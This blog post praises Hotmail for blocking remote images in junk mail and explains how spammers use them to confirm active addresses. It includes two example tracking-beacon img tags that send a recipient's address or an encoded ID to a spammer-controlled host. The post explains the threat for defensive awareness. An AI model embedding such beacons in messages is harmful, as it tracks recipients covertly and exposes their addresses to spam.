Images in Hotmail Junk Mail

Hotmail has finally deactivated outside images by default on junk email. This is important because spammers can use outside images – and by outside I mean requested from a web site and not included with the email – to track who is reading their spam emails. This gives them a list of “active” email addresses to spam further. Here’s a trivial example:

<img src=”http://www.spammer.net/[email protected]”>

When Joe views the spam, this image will be requested and the querystring on the end of the picture filename will be processed by the web server. The web server will then know that [email protected] is a valid email address and store this information for later.

Most spammers obfuscate this a bit. For example, they may use a code number in place of the email address and IP numbers instead of a domain name. So an image tag can end up looking like:

<img src=”http://66.32.221.223/GJASKWE.GIF?ZZZ=EKDs314KL239kjwm23234″>

Which of course makes it harder to track exactly what’s going on there and who it’s coming from if the spammer changes IPs a lot. Most people don’t even realise its happening or the fact that the images are not contained in the email. Email written in HTML definitely has its share of problems.

I already block outside images from automatically downloading and appearing in the Mac Mail client. Kudos to Microsoft for implementing this in a free service! Though reducing spam to hotmail.com accounts – which lessens excess load on their servers – is probably the central motivation, it’s good either way. Is it in Outlook yet? I don’t use it regularly.